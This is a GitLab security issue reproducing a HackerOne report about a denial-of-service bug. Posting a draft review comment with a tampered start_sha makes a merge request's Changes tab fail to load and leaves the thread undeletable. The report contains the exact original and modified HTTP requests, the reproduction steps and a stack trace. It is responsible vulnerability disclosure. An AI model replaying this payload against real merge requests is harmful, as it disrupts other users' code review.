Invalid 'start_sha' value in POST `/{group}/{project}/-/merge_requests/{id}/drafts` when comment on merge requests leads to changes unable to load
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #2058514](https://hackerone.com/reports/2058514)** by `toukakirishima` on 2023-07-09, assigned to `GitLab Team`:
[Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)
## Report
##### Summary
I found a DOS vulnerability when comment on file merge requests (on the *Changes* menu). I noticed if **start_sha** is not validated first it causes DOS (user can't load file on *Changes* menu and cant delete the thread).
Normally you can delete threads that you have created.
And can load files on *Changes* menu.
But as an attacker I can make the victim unable to load file on *Changes* menu and cant delete the thread. Even admin can't delete thread.
Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.
And Touka Kirishima (victim) made Merge requests.
##### Steps to reproduce
1. Go to merge requests
2. Go to *Changes* menu
3. Comment on this file
4. Click Start a review and makesure burpsuite is on. You will see request like following, Example :
```
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
```
5. Send to Repeater
6. Change *start_sha*. Example :
```
POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs
X-Csrf-Token: x
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 707
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c15382791\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}
```
7. Click Send
8. Finish and Submit review
9. Reload the page and you unable to load file on *Changes* menu and cant delete the thread
**POV from Attacker**
**POV from Victim**
##### POC
##### Relevant logs and/or screenshots
`
TypeError: this.discussion.diff_file is null
diffViewerMode diff_with_note.vue:44
VueJS 3
get
evaluate
Gr
isTextFile diff_with_note.vue:56
VueJS 3
get
evaluate
Gr
U diff_with_note.vue:1
VueJS 52
_render
r
get
t
mount
$mount
init
d
d
g
d
g
d
g
d
g
d
g
d
Lo
_update
r
get
t
mount
$mount
init
d
d
Lo
_update
r
get
t
mount
$mount
init
d
d
D
E
E
E
E
Lo
_update
r
get
run
mr
Cn
_n
instrument.js:108:32
kt instrument.js:108
VueJS 55
mn
gn
pn
_render
r
get
t
mount
$mount
init
d
d
g
d
g
d
g
d
g
d
g
d
Lo
_update
r
get
t
mount
$mount
init
d
d
Lo
_update
r
get
t
mount
$mount
init
d
d
D
E
E
E
E
Lo
_update
r
get
run
mr
Cn
_n
`
##### Output of checks
This bug happens on GitLab.com
#### Impact
- Attacker can make the victim unable to load file on *Changes* menu.
- Attacker can make the victim cant delete the thread. Even admin can't delete thread.
## Attachments
**Warning:** Attachments received through HackerOne, please exercise caution!
* [gambar.png](https://h1.sec.gitlab.net/a/86022423-2b23-492d-8329-bc80f883549e/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/3fa51848-bf05-4f18-9528-ed7124029d22/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/cc48d7d7-d80c-4f61-869e-a5159bd9764c/gambar.png)
* [Screenshot_10.png](https://h1.sec.gitlab.net/a/532402e8-aa83-4214-bce8-1176b683ce29/Screenshot_10.png)
* [gambar.png](https://h1.sec.gitlab.net/a/9da922d7-76ad-4b1a-8039-bd875243b2fd/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/9cee7975-83e1-4935-a184-28b550ff632a/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/008ebc15-a64a-4e3c-a641-a6009d85ff47/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/018998fc-4b4c-44ba-b03f-5b986bea2006/gambar.png)
* [Screenshot_12.png](https://h1.sec.gitlab.net/a/e6e46923-5539-45c7-81db-97ce1c091076/Screenshot_12.png)
* [gambar.png](https://h1.sec.gitlab.net/a/a419c293-81d7-43f9-8049-f78234f98ada/gambar.png)
* [gambar.png](https://h1.sec.gitlab.net/a/35e206cd-0ea3-4d31-b369-3c84dbc905fa/gambar.png)
* [Screenshot_13.png](https://h1.sec.gitlab.net/a/409a8909-39bc-4e7a-88e9-493a0c0157d1/Screenshot_13.png)
* [gambar.png](https://h1.sec.gitlab.net/a/b230572d-3b9b-4086-87ed-b54189a872b1/gambar.png)
* [Screenshot_14.png](https://h1.sec.gitlab.net/a/8edc0495-0056-4775-af78-fb81ce5d8345/Screenshot_14.png)
* [Screenshot_15.png](https://h1.sec.gitlab.net/a/eef02ee0-c7a6-4cb5-b4be-452e041f0846/Screenshot_15.png)
* [Screenshot_16.png](https://h1.sec.gitlab.net/a/665bfe63-f7a9-4fe6-9acb-6228f5681fcc/Screenshot_16.png)
* [gambar.png](https://h1.sec.gitlab.net/a/496890a9-7ac2-4bb3-870a-6c9b894eb737/gambar.png)
* [bandicam_2023-07-09_19-04-28-764.mp4](https://h1.sec.gitlab.net/a/14b09ed0-c2a6-4e98-b730-2f63519b020f/bandicam_2023-07-09_19-04-28-764.mp4)
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
issue